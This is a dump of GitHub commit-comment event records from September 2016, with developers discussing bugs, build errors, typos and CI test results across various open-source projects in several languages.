{"id":"4577522116","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063844,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:25:16Z","updated_at":"2016-09-17T07:25:16Z","body":"> Do you mind to enlighten me on meaning of \"modular\" here? Something that webpack@2 can slice and dice or there is more to it?\r\n\r\n[Yes](https://github.com/caolan/async/tree/master/lib)."}},"created_at":"2016-09-17T07:25:16Z"}
{"id":"4577522227","type":"CommitCommentEvent","actor":{"login":"ChALkeR"},"repo":{"name":"tschaub/mock-fs"},"payload":{"comment":{"id":19063845,"position":null,"line":null,"path":null,"commit_id":"b534a0602530b181c03c55f7a622f95eb4929aba","created_at":"2016-09-17T07:25:21Z","updated_at":"2016-09-17T07:25:21Z","body":"Note that this would crash on anyone using the legacy string interface of `.read()`/`.write()`."}},"created_at":"2016-09-17T07:25:21Z"}
{"id":"4577522786","type":"CommitCommentEvent","actor":{"login":"jmayoralas"},"repo":{"name":"jmayoralas/Z80VirtualMachineKit"},"payload":{"comment":{"id":19063846,"position":17,"line":27,"path":"Z80VirtualMachineKit/Z80VirtualMachineKit/Tape.swift","commit_id":"f3a84407e53450ee44e4d5d3fbc816156a8a783f","created_at":"2016-09-17T07:25:49Z","updated_at":"2016-09-17T07:25:49Z","body":"😅"}},"created_at":"2016-09-17T07:25:49Z"}
{"id":"4577526183","type":"CommitCommentEvent","actor":{"login":"EnaTopoljak"},"repo":{"name":"EnaTopoljak/Zadace"},"payload":{"comment":{"id":19063848,"position":null,"line":null,"path":null,"commit_id":"bbcc0aac3e4614264051d9ae80730d4d3d449e3f","created_at":"2016-09-17T07:28:29Z","updated_at":"2016-09-17T07:28:29Z","body":"Zdravo Irfane,\n\nZavrsit cu ostalo cim prije.\n\nPoslano s mojeg iPhonea\n\n16.09.2016., u 22:51, irfanG <notifications@github.com> napisao:\n\n> cao ena, na dobrom si puto da zavrsis, ali jos uvijek nisi otklonila sve buggove npr:\n> slika na tableView se ne prikazuje\n> ne moze se snimiti meal\n> ne moze se rating promjeniti\n> \n> :)\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n> \n"}},"created_at":"2016-09-17T07:28:29Z"}
{"id":"4577526424","type":"CommitCommentEvent","actor":{"login":"ttimz1313"},"repo":{"name":"wasdennnoch/AndroidN-ify"},"payload":{"comment":{"id":19063849,"position":null,"line":null,"path":null,"commit_id":"ef503a8281be21bf3b94a90f340b348535a2d5ec","created_at":"2016-09-17T07:28:42Z","updated_at":"2016-09-17T07:28:42Z","body":"ef503a8"}},"created_at":"2016-09-17T07:28:42Z"}
{"id":"4577528314","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063852,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:30:20Z","updated_at":"2016-09-17T07:30:20Z","body":"Looks pretty similar to me :) https://github.com/alexindigo/asynckit/tree/master/lib – I mean for \"monolithic (asynckit)\" :)\r\n\r\nBut it helps only with third-party bundlers, AFAIK npm doesn't fetch individual files from packages yet. So all that unused code gets pulled into your server-side artifact. (My assumption we're not using bundlers for server side code yet)."}},"created_at":"2016-09-17T07:30:20Z"}
{"id":"4577529649","type":"CommitCommentEvent","actor":{"login":"jmayoralas"},"repo":{"name":"jmayoralas/Z80VirtualMachineKit"},"payload":{"comment":{"id":19063855,"position":17,"line":27,"path":"Z80VirtualMachineKit/Z80VirtualMachineKit/Tape.swift","commit_id":"f3a84407e53450ee44e4d5d3fbc816156a8a783f","created_at":"2016-09-17T07:31:24Z","updated_at":"2016-09-17T07:31:24Z","body":"testing...\r\n\r\nSaludos, José Luis\r\n\r\n> El 17 sept 2016, a las 9:17, Antonio Pérez <notifications@github.com> escribió:\r\n> \r\n> Typo: it should be kTStatesPerMilliSecond\r\n> \r\n> I can't help more than this at the moment... 👼\r\n> \r\n> —\r\n> You are receiving this because you authored the thread.\r\n> Reply to this email directly, view it on GitHub, or mute the thread.\r\n> \r\n"}},"created_at":"2016-09-17T07:31:24Z"}
{"id":"4577530823","type":"CommitCommentEvent","actor":{"login":"skarcha"},"repo":{"name":"jmayoralas/Z80VirtualMachineKit"},"payload":{"comment":{"id":19063856,"position":9,"line":289,"path":"Z80VirtualMachineKit/Z80VirtualMachineKit/Tape/TapeData.swift","commit_id":"3ed4752a1e2fabc576860d3fe22116a2b278beee","created_at":"2016-09-17T07:32:23Z","updated_at":"2016-09-17T07:32:23Z","body":"What about...\r\n\r\n```swift\r\nlet secondPulseLength = firstPulseLength + 2\r\n```\r\n\r\nCouldn't it be better?"}},"created_at":"2016-09-17T07:32:23Z"}
{"id":"4577531100","type":"CommitCommentEvent","actor":{"login":"jmayoralas"},"repo":{"name":"jmayoralas/Z80VirtualMachineKit"},"payload":{"comment":{"id":19063857,"position":17,"line":27,"path":"Z80VirtualMachineKit/Z80VirtualMachineKit/Tape.swift","commit_id":"f3a84407e53450ee44e4d5d3fbc816156a8a783f","created_at":"2016-09-17T07:32:41Z","updated_at":"2016-09-17T07:32:41Z","body":"Cool ! I can answer this directly from mail !"}},"created_at":"2016-09-17T07:32:41Z"}
{"id":"4577532213","type":"CommitCommentEvent","actor":{"login":"guyzmo"},"repo":{"name":"guyzmo/git-repo"},"payload":{"comment":{"id":19063859,"position":null,"line":null,"path":null,"commit_id":"1d4d067029f9c86c34ec0280a032835b5cc40687","created_at":"2016-09-17T07:33:38Z","updated_at":"2016-09-17T07:33:38Z","body":"Hack to solve the issue referenced in sigmavirus24/github3.py#634"}},"created_at":"2016-09-17T07:33:38Z"}
{"id":"4577532324","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063861,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-17T07:33:44Z","updated_at":"2016-09-17T07:33:44Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1191 of 1191 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.03%25-green.svg)</a>\n"}},"created_at":"2016-09-17T07:33:44Z"}
{"id":"4577533274","type":"CommitCommentEvent","actor":{"login":"skarcha"},"repo":{"name":"jmayoralas/Z80VirtualMachineKit"},"payload":{"comment":{"id":19063863,"position":17,"line":27,"path":"Z80VirtualMachineKit/Z80VirtualMachineKit/Tape.swift","commit_id":"f3a84407e53450ee44e4d5d3fbc816156a8a783f","created_at":"2016-09-17T07:34:33Z","updated_at":"2016-09-17T07:34:33Z","body":"Yep! This is great! :D\n\nEl sáb., 17 sept. 2016 a las 9:32, jmayoralas (<notifications@github.com>)\nescribió:\n\n> Cool ! I can answer this directly from mail !\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/jmayoralas/Z80VirtualMachineKit/commit/f3a84407e53450ee44e4d5d3fbc816156a8a783f#commitcomment-19063857>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AALBeTqavwEV3B8P4Bd7CV9kTC4-rqrOks5qq5eZgaJpZM4J_iCq>\n> .\n>\n-- \n\nSaludos:\nAntonio Pérez\n"}},"created_at":"2016-09-17T07:34:33Z"}
{"id":"4577534702","type":"CommitCommentEvent","actor":{"login":"jmayoralas"},"repo":{"name":"jmayoralas/Z80VirtualMachineKit"},"payload":{"comment":{"id":19063865,"position":9,"line":289,"path":"Z80VirtualMachineKit/Z80VirtualMachineKit/Tape/TapeData.swift","commit_id":"3ed4752a1e2fabc576860d3fe22116a2b278beee","created_at":"2016-09-17T07:35:52Z","updated_at":"2016-09-17T07:35:52Z","body":"Second pulse length must be readed from the new location. Isn't a mere plus two addition."}},"created_at":"2016-09-17T07:35:52Z"}
{"id":"4577537199","type":"CommitCommentEvent","actor":{"login":"kolkov"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19063869,"position":null,"line":null,"path":null,"commit_id":"4ce27c92c7bef9986856d45ee2fa376eab3305e1","created_at":"2016-09-17T07:38:07Z","updated_at":"2016-09-17T07:38:07Z","body":"They updated system.js to \"systemjs\": \"0.19.27\", https://angular.io/docs/ts/latest/quickstart.html\r\n\r\n```\r\n--> Building commonjs and typings using tsc...\r\n<-- done!\r\n--> Cleaning: D:\\!Projects\\TypeScript\\ui-router\\ui-router\\build_packages\\ng2\r\nShellJS: internal error\r\nError: EPERM: operation not permitted, mkdir 'D:\\!Projects\\TypeScript\\ui-router\\ui-router\\build_packages\\ng2'\r\n    at Error (native)\r\n    at Object.fs.mkdirSync (fs.js:922:18)\r\n    at mkdirSyncRecursive (D:\\!Projects\\TypeScript\\ui-router\\ui-router\\node_modules\\shelljs\\src\\mkdir.js:24:8)\r\n    at D:\\!Projects\\TypeScript\\ui-router\\ui-router\\node_modules\\shelljs\\src\\mkdir.js:78:9\r\n    at Array.forEach (native)\r\n    at _mkdir (D:\\!Projects\\TypeScript\\ui-router\\ui-router\\node_modules\\shelljs\\src\\mkdir.js:58:8)\r\n    at D:\\!Projects\\TypeScript\\ui-router\\ui-router\\node_modules\\shelljs\\src\\common.js:344:25\r\n    at prepPackage (D:\\!Projects\\TypeScript\\ui-router\\ui-router\\scripts\\package.js:49:3)\r\n    at Object.<anonymous> (D:\\!Projects\\TypeScript\\ui-router\\ui-router\\scripts\\package.js:17:25)\r\n    at Module._compile (module.js:556:32)\r\n```\r\nAll tests passed, but when building I got this error...\r\nThis folder should be deleted by me every time before assembly? Or this is an error?"}},"created_at":"2016-09-17T07:38:07Z"}
{"id":"4577537749","type":"CommitCommentEvent","actor":{"login":"zhanghz1120"},"repo":{"name":"goagent/goagent"},"payload":{"comment":{"id":19063870,"position":null,"line":null,"path":null,"commit_id":"e492ed0283f5cde7cf71d7ac47429f64aa48cd13","created_at":"2016-09-17T07:38:38Z","updated_at":"2016-09-17T07:38:38Z","body":"谢谢你们，历史会记住这一刻，现在的xx-net也很好用"}},"created_at":"2016-09-17T07:38:38Z"}
{"id":"4577538255","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063871,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:39:06Z","updated_at":"2016-09-17T07:39:06Z","body":"> Looks pretty similar to me :) \r\n\r\nLOL I was looking at (async-kit)[https://github.com/cronvel/async-kit]\r\n\r\n> But it helps only with third-party bundlers, AFAIK npm doesn't fetch individual files from packages yet. \r\n\r\nSure that's where the pre-processing or caching comes in depending on your setup."}},"created_at":"2016-09-17T07:39:06Z"}
{"id":"4577538676","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"ReVision-Docencia-20/Columnas"},"payload":{"comment":{"id":19063872,"position":null,"line":null,"path":null,"commit_id":"741fa2a08571b693a311a5bf36a94a2dfe307461","created_at":"2016-09-17T07:39:29Z","updated_at":"2016-09-17T07:39:29Z","body":"El plazo era antes de ayer y está ya enviada. Así que en esta ocasión,\nnada. En otras ocasiones, simplemente añade lo que quieras o, si quieres\ncomentar, comentario LaTeX en el texto, issue o comentario directamente\nsobre el commit en el que se haga el cambio.\n"}},"created_at":"2016-09-17T07:39:29Z"}
{"id":"4577539616","type":"CommitCommentEvent","actor":{"login":"devinrayolsen"},"repo":{"name":"devinrayolsen/DRO-Matic"},"payload":{"comment":{"id":19063874,"position":null,"line":null,"path":null,"commit_id":"e2baf525e2a4e282c5ca0270eaba6f21efb8b56d","created_at":"2016-09-17T07:40:17Z","updated_at":"2016-09-17T07:40:17Z","body":"We removed all session date/time global variables for the existing system date/time variables.\r\nRemoved all session date/time setting functions in place of existing system date/time functions.\r\nScreen matrix function's repeated calls to same data point within matrix objects is summed up into variables."}},"created_at":"2016-09-17T07:40:17Z"}
{"id":"4577540238","type":"CommitCommentEvent","actor":{"login":"devinrayolsen"},"repo":{"name":"devinrayolsen/DRO-Matic"},"payload":{"comment":{"id":19063875,"position":null,"line":null,"path":null,"commit_id":"e2baf525e2a4e282c5ca0270eaba6f21efb8b56d","created_at":"2016-09-17T07:40:53Z","updated_at":"2016-09-17T07:40:53Z","body":"Also consolidated down the get / set core, crop, channel and session data files."}},"created_at":"2016-09-17T07:40:53Z"}
{"id":"4577540459","type":"CommitCommentEvent","actor":{"login":"jdalton"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063876,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:41:05Z","updated_at":"2016-09-17T07:41:05Z","body":"I see asynckit is your thing so it makes sense."}},"created_at":"2016-09-17T07:41:05Z"}
{"id":"4577541467","type":"CommitCommentEvent","actor":{"login":"zhaoxile"},"repo":{"name":"MikuAuahDark/NPPS"},"payload":{"comment":{"id":19063877,"position":null,"line":null,"path":null,"commit_id":"b86dfb7cd10a05c268173183d03916763078924e","created_at":"2016-09-17T07:41:59Z","updated_at":"2016-09-17T07:41:59Z","body":"it didn't take effect"}},"created_at":"2016-09-17T07:41:59Z"}
{"id":"4577544075","type":"CommitCommentEvent","actor":{"login":"wangzang"},"repo":{"name":"wangzang/learning"},"payload":{"comment":{"id":19063878,"position":null,"line":null,"path":null,"commit_id":"b3adaf09fe92cdd06ea5fe505b45eb4dd10b4680","created_at":"2016-09-17T07:44:23Z","updated_at":"2016-09-17T07:44:23Z","body":"White space is messed up due to a crappy IDE on my iPhone. "}},"created_at":"2016-09-17T07:44:23Z"}
{"id":"4577544693","type":"CommitCommentEvent","actor":{"login":"dotModded"},"repo":{"name":"BruceKnowsHow/Ebin-Shaders"},"payload":{"comment":{"id":19063879,"position":null,"line":null,"path":null,"commit_id":"ba9997a90c7f16b303061eb53d83cf5ab309859c","created_at":"2016-09-17T07:44:55Z","updated_at":"2016-09-17T07:44:55Z","body":"My environment was broken, sorry guys."}},"created_at":"2016-09-17T07:44:55Z"}
{"id":"4577546333","type":"CommitCommentEvent","actor":{"login":"alexindigo"},"repo":{"name":"form-data/form-data"},"payload":{"comment":{"id":19063880,"position":null,"line":null,"path":null,"commit_id":"1749b78d50580fbd080e65c1eb9702ad4f4fc0c0","created_at":"2016-09-17T07:46:16Z","updated_at":"2016-09-17T07:46:16Z","body":"I'm yet to stop worrying and learn to love the pre-processing (especially of the server code). :)\r\n\r\nAnd yes, I was using async from beginning of times and it was so awesome, but then I started to notice that, I had to mangle my code to fit it into async's paradigm of collection of functions (tasks) where in most cases I was working with collection of values. Eventually that accumulated struggle pushed me to create asynckit (and yes all good names are gone on npm)  :)\r\n\r\nThank you for sharing your vision.\r\n"}},"created_at":"2016-09-17T07:46:16Z"}
{"id":"4577546621","type":"CommitCommentEvent","actor":{"login":"altelch"},"repo":{"name":"altelch/iso-tp"},"payload":{"comment":{"id":19063881,"position":null,"line":null,"path":null,"commit_id":"fc26357548d7a7d4a5a54886ee58b4dd3d79a7bf","created_at":"2016-09-17T07:46:32Z","updated_at":"2016-09-17T07:46:32Z","body":"Am 16.09.2016 um 19:55 schrieb oqibidipo:\n>\n> |iso-tp.h| still has |uint16_t id|. Did you forget to add it to the \n> commit?\n> Besides, |const| is quite pointless with an integer parameter.\n>\n> See http://forum.arduino.cc/index.php?topic=424222.0\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/altelch/iso-tp/commit/fc26357548d7a7d4a5a54886ee58b4dd3d79a7bf#commitcomment-19057799>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/ACdAcePGsdvmSf9E0iARw5vus0QmMkNoks5qqtgugaJpZM4J_MIh>.\n>\nHi,\n\nthank you! I fixed this in a new commit. const is removed, uint16_t \ndefinitions changed to uint32_t and compile of example works.\n\nGreetings,\n\n\n                   Heiko.\n\n"}},"created_at":"2016-09-17T07:46:32Z"}
{"id":"4577546684","type":"CommitCommentEvent","actor":{"login":"TheDarkBomber"},"repo":{"name":"TeamSpen210/BEE2-items"},"payload":{"comment":{"id":19063882,"position":null,"line":null,"path":null,"commit_id":"66e0476e4158d681bfbbc572a133146ae189d9f2","created_at":"2016-09-17T07:46:36Z","updated_at":"2016-09-17T07:46:36Z","body":":-1: This is NOT a good idea."}},"created_at":"2016-09-17T07:46:36Z"}
{"id":"4577547620","type":"CommitCommentEvent","actor":{"login":"JuanjoUE"},"repo":{"name":"ReVision-Docencia-20/Columnas"},"payload":{"comment":{"id":19063883,"position":null,"line":null,"path":null,"commit_id":"741fa2a08571b693a311a5bf36a94a2dfe307461","created_at":"2016-09-17T07:47:28Z","updated_at":"2016-09-17T07:47:28Z","body":"\"casi\"....\r\nGracias. El próximo llego a tiempo fijo.\r\n¿Cuándo empezamos? Si alguien tiene una idea para un articulo, ¿la propone y se va refinando o hay una especie de orden como para ser presidente de la comunidad de vecinos? ¿o se propone el tema primero y se escribe después de haberlo consensuado?\r\nSoy como un niño, preguntón y puñetero...\r\n;-)\r\n\r\n"}},"created_at":"2016-09-17T07:47:28Z"}
{"id":"4577551351","type":"CommitCommentEvent","actor":{"login":"Kirek"},"repo":{"name":"manjaro/packages-community"},"payload":{"comment":{"id":19063886,"position":null,"line":null,"path":null,"commit_id":"cb11236e685ee38518955ce895390f1e550f0b74","created_at":"2016-09-17T07:50:54Z","updated_at":"2016-09-17T07:50:54Z","body":"seems fine to me"}},"created_at":"2016-09-17T07:50:54Z"}
{"id":"4577556300","type":"CommitCommentEvent","actor":{"login":"ly29"},"repo":{"name":"nortikin/sverchok"},"payload":{"comment":{"id":19063892,"position":null,"line":null,"path":null,"commit_id":"6e688cdbe8237e16e6e1544098694c44722d12f7","created_at":"2016-09-17T07:55:17Z","updated_at":"2016-09-17T07:55:17Z","body":"Okay that does look a bit strange."}},"created_at":"2016-09-17T07:55:17Z"}
{"id":"4577557005","type":"CommitCommentEvent","actor":{"login":"JJ"},"repo":{"name":"ReVision-Docencia-20/Columnas"},"payload":{"comment":{"id":19063893,"position":null,"line":null,"path":null,"commit_id":"741fa2a08571b693a311a5bf36a94a2dfe307461","created_at":"2016-09-17T07:55:56Z","updated_at":"2016-09-17T07:55:56Z","body":"Sí, esa es un poco la idea. El subdirectorio \"en cocina\" está para eso,\npara empezar nuevas columnas. También se puede poner un issue para irlo\nrefinando antes de ponerse a escribir, pero si tienes las ideas claras,\nsimplemente escribe.\n"}},"created_at":"2016-09-17T07:55:56Z"}
{"id":"4577557805","type":"CommitCommentEvent","actor":{"login":"bojidar-bg"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19063894,"position":5,"line":514,"path":"src/routes/asset_edit.php","commit_id":"a2cfa501fea9cd1f7dc28ae180e9b7a51006ab9e","created_at":"2016-09-17T07:56:39Z","updated_at":"2016-09-17T07:56:39Z","body":"No, since the `trim($body['hash']) != ''` part would make it go the the else on line 523"}},"created_at":"2016-09-17T07:56:39Z"}
{"id":"4577558368","type":"CommitCommentEvent","actor":{"login":"kolkov"},"repo":{"name":"angular-ui/ui-router"},"payload":{"comment":{"id":19063895,"position":null,"line":null,"path":null,"commit_id":"4ce27c92c7bef9986856d45ee2fa376eab3305e1","created_at":"2016-09-17T07:57:09Z","updated_at":"2016-09-17T07:57:09Z","body":"Yes! This is built using TypeScript 1.8.10 and working with our bootstrap app as expected! But 2.0.2 got some errors as before."}},"created_at":"2016-09-17T07:57:09Z"}
{"id":"4577559247","type":"CommitCommentEvent","actor":{"login":"rvanheest"},"repo":{"name":"DANS-KNAW/course-scala"},"payload":{"comment":{"id":19063897,"position":4,"line":4,"path":"src/main/scala/workshop3/assignments/Employee.md","commit_id":"9bba11d5a87308652c0c0b35a17df3886fac2f87","created_at":"2016-09-17T07:58:02Z","updated_at":"2016-09-17T07:58:02Z","body":"No, I meant `Employee.scala`... But I guess you already found that out :)\r\nI'll fix this in a new PR..."}},"created_at":"2016-09-17T07:58:02Z"}
{"id":"4577562617","type":"CommitCommentEvent","actor":{"login":"aaugustin"},"repo":{"name":"django/django"},"payload":{"comment":{"id":19063905,"position":29,"line":405,"path":"django/core/urlresolvers.py","commit_id":"31b5275235bac150a54059db0288a19b9e0516c7","created_at":"2016-09-17T08:00:39Z","updated_at":"2016-09-17T08:00:39Z","body":"Can you ask on the django-developers mailing list?\r\n\r\nI don't remember the minutiae of every change I made to Django three years ago and I'm not sure I'll find time to investigate your comment in the next months."}},"created_at":"2016-09-17T08:00:39Z"}
{"id":"4577564207","type":"CommitCommentEvent","actor":{"login":"akien-mga"},"repo":{"name":"godotengine/asset-library"},"payload":{"comment":{"id":19063908,"position":5,"line":514,"path":"src/routes/asset_edit.php","commit_id":"a2cfa501fea9cd1f7dc28ae180e9b7a51006ab9e","created_at":"2016-09-17T08:01:50Z","updated_at":"2016-09-17T08:01:50Z","body":"Right. But what would happen if a moderator accepts a new asset without giving a hash? It would validate it with a `null` hash no? It should throw an error in such a case."}},"created_at":"2016-09-17T08:01:50Z"}
{"id":"4577567385","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063912,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-17T08:03:33Z","updated_at":"2016-09-17T08:03:33Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: Tests Failed (1192 of 1765 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-67.54%25-red.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-36.69%25-red.svg)</a>\n"}},"created_at":"2016-09-17T08:03:33Z"}
{"id":"4577567480","type":"CommitCommentEvent","actor":{"login":"andygrunwald"},"repo":{"name":"andygrunwald/megos"},"payload":{"comment":{"id":19063913,"position":null,"line":null,"path":null,"commit_id":"476211b25600d683452a6e2cf1192aae7a1f37e4","created_at":"2016-09-17T08:03:38Z","updated_at":"2016-09-17T08:03:38Z","body":"Thank you @sherzberg, good catch.\r\nDone in https://github.com/andygrunwald/megos/commit/13a95408baf157c7ab4568bfaac0583a92f5e3a1"}},"created_at":"2016-09-17T08:03:38Z"}
{"id":"4577567535","type":"CommitCommentEvent","actor":{"login":"manups4e"},"repo":{"name":"Grarak/android_device_oneplus_oneplus2"},"payload":{"comment":{"id":19063914,"position":null,"line":null,"path":null,"commit_id":"a13a4a75ab7c80957cd3c5d10eb1e6d8e4f9895a","created_at":"2016-09-17T08:03:41Z","updated_at":"2016-09-17T08:03:41Z","body":"you did update the proprietary files.. but didn't add them to the vendor repository.. could this be the reason why ril and wifi are not working anymore on new builds?"}},"created_at":"2016-09-17T08:03:41Z"}
{"id":"4577567801","type":"CommitCommentEvent","actor":{"login":"barisusakli"},"repo":{"name":"NodeBB/nodebb-plugin-composer-default"},"payload":{"comment":{"id":19063915,"position":4,"line":357,"path":"static/less/composer.less","commit_id":"12668aeaab7fbd0bd92327dbc7212e3cc8d932b7","created_at":"2016-09-17T08:03:54Z","updated_at":"2016-09-17T08:03:54Z","body":"![image](https://cloud.githubusercontent.com/assets/2583394/18606934/63e7d658-7cc6-11e6-8f11-7c7ba710c27e.png)\r\n\r\nIs what I get on chrome desktop."}},"created_at":"2016-09-17T08:03:54Z"}
{"id":"4577568194","type":"CommitCommentEvent","actor":{"login":"fjcarreterox"},"repo":{"name":"fjcarreterox/gestion-entregas-AC"},"payload":{"comment":{"id":19063916,"position":null,"line":null,"path":null,"commit_id":"ed23628e0ff758eeb8fa0551a973ca6b02659481","created_at":"2016-09-17T08:04:14Z","updated_at":"2016-09-17T08:04:14Z","body":"To PRO."}},"created_at":"2016-09-17T08:04:14Z"}
{"id":"4577568367","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19063918,"position":null,"line":null,"path":null,"commit_id":"7440a10dea02a9331ad457fed8bbec30fd4df8a2","created_at":"2016-09-17T08:04:24Z","updated_at":"2016-09-17T08:04:24Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-7440a10dea02a9331ad457fed8bbec30fd4df8a2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-17T08:04:24Z"}
{"id":"4577570981","type":"CommitCommentEvent","actor":{"login":"mcostalba"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19063921,"position":111,"line":479,"path":"src/evaluate.cpp","commit_id":"01f2466f6eba4d4b28f0cd6ac7c2fd38d95b9401","created_at":"2016-09-17T08:06:39Z","updated_at":"2016-09-17T08:06:39Z","body":"@joergoster Oh well :-) you have to remember to change it in case you modify the / 4096, indeed this is too smart for me, and 4% of cases affected is just too low to be smart.\r\n\r\nI would leave as is.\r\n"}},"created_at":"2016-09-17T08:06:39Z"}
{"id":"4577572279","type":"CommitCommentEvent","actor":{"login":"Simn"},"repo":{"name":"HaxeFoundation/haxe"},"payload":{"comment":{"id":19063924,"position":null,"line":null,"path":null,"commit_id":"f0aeb9bcfc9701c18f56058863d8c0ada919f037","created_at":"2016-09-17T08:07:45Z","updated_at":"2016-09-17T08:07:45Z","body":"I have reverted this for now because nothing is working anymore."}},"created_at":"2016-09-17T08:07:45Z"}
{"id":"4577572782","type":"CommitCommentEvent","actor":{"login":"kdinev"},"repo":{"name":"IgniteUI/ignite-ui"},"payload":{"comment":{"id":19063925,"position":null,"line":null,"path":null,"commit_id":"d0f7550d6d9393612b6dc2ee27c94da7d9d930fb","created_at":"2016-09-17T08:08:15Z","updated_at":"2016-09-17T08:08:15Z","body":"#353 "}},"created_at":"2016-09-17T08:08:15Z"}
{"id":"4577572909","type":"CommitCommentEvent","actor":{"login":"lpatiny"},"repo":{"name":"image-js/core"},"payload":{"comment":{"id":19063926,"position":4,"line":79,"path":"package.json","commit_id":"4ffeb2f992e19cef9cd491949175341e56970f2a","created_at":"2016-09-17T08:08:23Z","updated_at":"2016-09-17T08:08:23Z","body":"I thought I did ...\r\n npm install better-console --save --dev\r\nWhat was wrong there ?"}},"created_at":"2016-09-17T08:08:23Z"}
{"id":"4577572965","type":"CommitCommentEvent","actor":{"login":"kdinev"},"repo":{"name":"IgniteUI/ignite-ui"},"payload":{"comment":{"id":19063927,"position":null,"line":null,"path":null,"commit_id":"7df4d73271c9343523be2156c1b8fa5fbc191161","created_at":"2016-09-17T08:08:26Z","updated_at":"2016-09-17T08:08:26Z","body":"#353"}},"created_at":"2016-09-17T08:08:26Z"}
{"id":"4577573261","type":"CommitCommentEvent","actor":{"login":"G047"},"repo":{"name":"AdamAliRS/Agar.io-Bots"},"payload":{"comment":{"id":19063928,"position":null,"line":null,"path":null,"commit_id":"43a42e55f6016a623678fe2d42373c659bb42c6f","created_at":"2016-09-17T08:08:40Z","updated_at":"2016-09-17T08:08:40Z","body":"Thanks"}},"created_at":"2016-09-17T08:08:40Z"}
{"id":"4577573281","type":"CommitCommentEvent","actor":{"login":"kdinev"},"repo":{"name":"IgniteUI/ignite-ui"},"payload":{"comment":{"id":19063929,"position":null,"line":null,"path":null,"commit_id":"b6e66585e4075fabd728e25862fee89ced04f720","created_at":"2016-09-17T08:08:41Z","updated_at":"2016-09-17T08:08:41Z","body":"#353 "}},"created_at":"2016-09-17T08:08:41Z"}
